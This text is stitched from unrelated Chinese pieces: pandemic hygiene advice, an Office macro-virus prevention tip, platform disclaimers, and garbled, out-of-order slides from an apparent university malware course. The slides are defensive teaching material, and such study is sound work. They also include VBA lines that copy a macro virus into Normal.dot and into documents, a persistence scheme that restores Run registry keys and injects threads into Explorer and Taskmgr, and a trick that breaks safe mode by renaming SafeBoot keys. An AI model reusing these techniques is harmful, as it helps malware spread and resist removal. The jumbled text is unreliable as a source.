因此,保持良好的个人卫生习惯,如勤洗手、避免触摸脸部以及避免与感染者近距离接触,是预防病毒传播的重要措施。
其次,佩戴口罩是个人防护的重要手段。
正确佩戴口罩可以有效阻止病毒通过空气飞沫传播。
根据疾病的传播途径不同,可选择使用医用口罩或普通口罩。
医用口罩适用于接触病毒较为密集的场所,如医院、公共交通工具等;普通口罩适用于人员密集但接触病毒风险相对较低的场所,如商场、超市等。
此外,每次佩戴口罩前应洗手,避免受污染物直接接触到口罩的内部,以确保防护效果。
同时,保持良好的个人卫生习惯也是预防病毒感染的重要措施之一。
勤洗手是最基本的个人卫生习惯,用肥皂和流动水彻底清洁双手,特别是在接触外界环境后,如回家、用餐前等。
同时,避免用手触摸面部、口、鼻和眼睛等黏膜,以减少病毒进入体内的机会。
此外,在咳嗽或打喷嚏时,应该用纸巾或屈肘遮挡口鼻,避免病毒飞沫散布到周围环境中。
除了个人防护措施,环境的清洁和消毒也是防止病毒传播的重要环节。
经常清洁和消毒常接触的表面,如门把手、电梯按钮等,使用含酒精的消毒液进行消毒,可以有效杀灭病毒。
此外,保持通风是非常重要的,开窗户或使用空气净化器可以改善空气质量,降低病毒浓度。
除了以上措施,每个人还应该积极参与社区疫情防控工作。
遵守相关部门和社区制定的疫情防控措施,如佩戴口罩、测量体温等,配合健康码等系统,及时报告个人的身体状况和接触史,是有效防控疫情扩散的重要手段。
三招防范宏病毒
三招防范宏病毒由于宏病毒经常在办公软件Office中出现,给广大用户造成不小的损失。
笔者发现,通过以下三招可以远离宏病毒(以Word为例)。
第一招:设置宏安全级别打开Word,选择“工具选项安全性宏安全性”命令,这样就打开了宏的安全级别属性设置选项,将安全级别由默认的“高”修改为“非常高”,最后单击“确定”即可。
这样可以防止除Word默认的宏以外的其他宏运行。
第二招:运行宏病毒自动提示打开Word,选择“工具选项安全性宏安全性”命令,单击“可靠发行商”标签,取消选择“信任所有安装的加载项和模板”复选框,然后单击“确定”即可。
这样当打开含有宏的Word文档时,就会提示宏已被禁止。
当然,也可能让正常的宏使用受到限制。
第三招:卸载VBA彻底预防宏病毒VBA全称是Visual Basic for Application,它是Microsoft Visual Basic的宏语言版本。
用于Windows应用程序的宏。
是Word中宏的支持工具包,一旦禁用此包,一些自定义模板和所有的宏将不可用。
具体方法:双击“控制面板”中的“添加/删除程序”图标,找到Microsoft Office的安装项,单击“更改”按钮,选择“添加或删除功能”选项后,单击“下一步”按钮,在弹出来的窗口选“选择应用程序的高级自定义”复选框,再单击“下一步”按钮,这样,就可以选择删除该工具包。
在打开的Office程序及附加内容和工具中单击“Office共享功能“前的加号,找到“Visual Basic for Application”,单击前面的驱动器图标,选择“不安装”按钮即可。
经过以上三招,宏病毒将会远离你的Office了,这里是以Word为例介绍的,其实对Excel 也同样适用,不妨一试。
、只要运行注册表就可以啦!具体做法:在“开始”里找到“运行”按纽,点击后在“打开”栏里输入“regedit”,就可以打开注册表了;找到HKEY_LOCAL_MACHINE打开,找SOFTWARE打开,找Microsoft打开,找office 打开,找11.0打开,找EXCEL打开,找security打开后看到它旁边的窗口有一项名称为LEVEL 的,双击它,在跳出的编辑DWORD值里面看到数值数据(V):下面的空格啦,你就可以在里面修改数值啦。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
4.其他的反病毒技术
1. 智能引擎技术 智能引擎技术发展了特征码扫描法的优点, 改进了其弊端,使得病毒扫描速度不随病 毒库的增大而减慢。例如,瑞星杀毒软件 2003之后的版本即采用了此项技术,使病 毒扫描速度比2002版提高了一倍之多;
4.其他的反病毒技术
2. 计算机监控技术
3. 文件实时监控技术
通过利用操作系统底层接口技术,对系统 中的所有类型文件或指定类型的文件进行 实时的行为监控,一旦有病毒传染或发作 时就及时报警。从而实现了对病毒的实时、 永久、自动监控。这种技术能够有效控制 病毒的传播途径,但是这种技术的实现难 度较大,系统资源的占用率也会有所降低。
驻留主进程体内的线程同时观察注册表和远程进程的情况。它 实时查询注册表里 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run键下相关可执行文件的键值,如果被删除就立 即将其添加上。这就是对注册表的实时监视,使得每次开机时 都会运行我们的可执行文件。 而另一个功能则是监视驻留在远程进程体内辅助线程的运行情 况,如果该线程被关闭,立即通过创建远程线程将被关闭的线 程驻留到特定的进程内。 驻留在远程进程体内的辅助线程则监视主进程的运行情况,如 果主进程被kill了,它会确认程序的可执行文件是否也被删除掉 了。如果系统目录下的可执行文件不存在了,则用我们备份的 文件恢复可执行文件 然后再重新启动程序 这样你在任务管理 器里怎么也删除 行文件,然后再重新启动程序,这样你在任 务管理器里怎么也删除不了主进程。
实验4:宏病毒的原理与防治 进阶要求:完成MacroV说明.doc中第二个实验
宏病毒--传染
获取病毒样本 Application.VBE.ActiveVBProject.VBComponents(VirusN ame).Export ExportSource
感染模板-dot Set Tmp = NormalTemplate.VBProject.VBComponents Tmp.Import ExportSource
2. 虚拟执行技术
技术通过虚拟执行方法查杀病毒,可以对付加密、变形、 异型及病毒生产机生产的病毒,具有如下特点: 在查杀病毒时在机器虚拟内存中模拟出一个“指令执行虚 拟机器” 在虚拟机环境中虚拟执行(不会被实际执行)可疑带毒文 件 在执行过程中,从虚拟机环境内截获文件数据,如果含有 可疑病毒代码,则杀毒后将其还原到原文件中,从而实现 对各类可执行文件内病毒的查杀
恶意软件的分析与防范
严飞 武汉大学计算机学院 yanfeiclass@
课时安排
1. 2. 3. 4. 5. 6. 7. 8. 恶意代码概述 计算机病毒 网络蠕虫 网页/移动恶意代码 后门、木马和Rootkit 常用检测技术和工具 课堂讨论与练习 期末考试
第二讲 传统的计算机病毒
一.生物病毒 二.计算机病毒的基本常识 三.计算机病毒相关技术
宏病毒防范
• 【工具】菜单中的【宏】-〉【安全性】
宏病毒防范
保护Normal模板 :【工具】菜单中的【选项】
宏病毒防范
通过DisableAutoMacros宏指令来禁止使用 自动宏 Sub autoexec() WordBasic.DisableAutoMacros True End Sub
病毒的防治
人类为防治病毒所做出的努力
立体防护
网络版 单机版 防病毒卡
目前广泛应用的几种防治技术
1. 特征码扫描法 特征码扫描法是分析出病毒的特征病毒码 并集中存放于病毒代码库文件中,在扫描 时将扫描对象与特征代码库比较,如有吻 合则判断为染上病毒。该技术实现简单有 效,安全彻底;但查杀病毒滞后,并且庞 大的特征码库会造成查毒速度下降;
windows映像劫持技术(IFEO)(在RootKit部分介绍) 恢复ssdt 许多安全软件失效(在RootKit部分介绍) ssdt对抗inline• ook突破进程保护(在RootKit部分介绍) h ……
监控进程的运行状态,保护进程
实验5:T-Mouse•
一个基于“三线程”的诱鼠器。 主线程需要完成的任务有三个,分别是准备工作,创建辅助线 程和程序主要功能的实现。 准备工作:为程序运行过程中所需要的一些部件做好准备,其 中包括文件复制和保存,一般情况下是把可执行文件复制到系 统目录下。 创建辅助线程包括两个线程,一个驻留在主进程体内, 另一个通过创建远程线程驻留到其他正在运行的进程体内。
标准宏
FileSave
FileSaveA s FilePrint FileOpen
保存文件
改名另存为文件 打印文件 打开文件
Word宏病毒感染过程
编制语言VBA\WordBasic等 环境:VBE
打开被感 染的文档 把宏加载到 内存 运行自动宏 宏病毒将自 己复制到全 局模板 新建(打开) 的文档被感染
两个辅助线程相互实时监视,如果监视对象被关闭了,就重新 创建线程或进程。其实,在程序中选择的远程进程驻体为 Explorer.exe和Taskmgr.exe。在通常情况下,如果用户知道 了远程线程的驻体为资源管理器后,就会打开任务管理器来结 束Explorer,这时再把 为资源管理器后,就会打开任务管理器 来结束 p ,这时再把远程线程驻入到任务管理器中。也就是说, 只要Explorer或Taskmgr有一个存在,就不可能结束主进程。 如果有其他Kill进程的工具,你就可以将其关闭掉,只要资源 管理器和任务管理器均不存在时,就没有驻体来维持远程进程。 不过,如果我们选择的远程进程为随机的,这就不容易发现了; 如果我们选择的远程进程为系统文件(如smss.exe会话管理 器),那么你是不会安全的结束远程线程,除非系统崩溃。
病毒的自我保护手段(续)
垃圾指令(花指令)
病毒的自我保护手段(续)
置换寄存器
病毒的自我保护手段(续)
置换子程序
BdyBody病毒有8个子 程序,因此有8! =4032个不同的病毒样 本 W32/Ghost有10个子程 序,因此有10! =3628800个不同的病 毒样本
病毒的自我保护手段(续)
手工清除宏病毒的方法
1. 打开宏菜单,在通用模板中删除您认为是病毒 的宏。 2. 打开带有病毒宏的文档(模板),然后打开宏 菜单,在通用模板和病毒文件名模板中删除您 认为是病毒的宏。 3. 保存清洁文档。
预防宏病毒
对于已染毒的模板文件(Normal.dot),应先其 中的自动宏清除(AutoOpen、AutoClose、 AutoNew),然后将其置成只读方式。 对于其他已染毒的文件均应将自动宏清除,这样 就可以达到清除病毒的目的。 平时使用时要加强预防。对来历不明的宏最好删 除。 先禁止所有自动执行的宏。 安装反病毒软件。
使防病毒软件不能线程保护技术 修改注表导致无法进入安全模式
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot下修改 Minimal和Network为任意名称即可
窗口检测法
检测带有某些关键字的软件,如360、安全卫士……
文件实时监控 内存实时监控 脚本实时监控 邮件实时监控 注册表实时监控 参考: 或者 /zhcn/sysinternals/default.aspx
4.其他的反病毒技术
3. 嵌入式杀毒技术 嵌入式杀毒技术是对病毒经常攻击的应用 程序或对象提供重点保护的技术,它利用 操作系统或应用程序提供的内部接口来实 现。它对使用频度高、使用范围广的主要 的应用软件提供被动式的防护。如对MSOffice、Outlook、IE、Winzip、NetAnt等 应用软件进行被动式杀毒。
宏病毒的特点
1. 2. 3. 4. 5. 传播极快 制作、变种方便 破坏可能性极大 多平台交叉感染 地域性问题
宏病毒的共性
宏病毒会感染DOC文档文件和DOT模板文 件。 打开时激活,通过Normal模板传播。 通过AutoOpen,AutoClose,AutoNew和 AutoExit等自动宏获得控制权。 病毒宏中必然含有对文档读写操作的宏指 令。
要达到宏病毒传染的目的,系统须具备以 下特性:
① 可以把特定的宏命令代码附加在指定文件上; ② 可以实现宏命令在不同文件之间的共享和传 递; ③ 可以在未经使用者许可的情况下获取某种控 制权。
可支持宏病毒的应用系统
Microsoft公司的WORD、EXCEL、Access、 PowerPoint、Project、Visio等产品; Inprise公司的Lotus AmiPro字处理软件; 此外,还包括AutoCAD、Corel Draw、 PDF等等。
感染文档-doc Set Doc = ActiveDocument.VBProject.VBComponents Doc.Import ExportSource
Word宏病毒发现方法
在Normal模板发现有AutoOpen等自动宏,FileSave等标 准宏或一些怪名字的宏,而自己又没有加载特殊模板,这 就有可能有病毒了。 当打开一个文档时,未经任何改动,立即就有存盘操作 打开以DOC为后缀的文件在另存菜单中只能以模板方式存 盘 无法使用“另存为(Save As)”修改路径 不能再被转存为其它格式的文件 DOC文件具备与DOT文档相一致的内部格式(尽管文件扩 展名未改变)。
检查父进程
检查父进程是否为Explorer.exe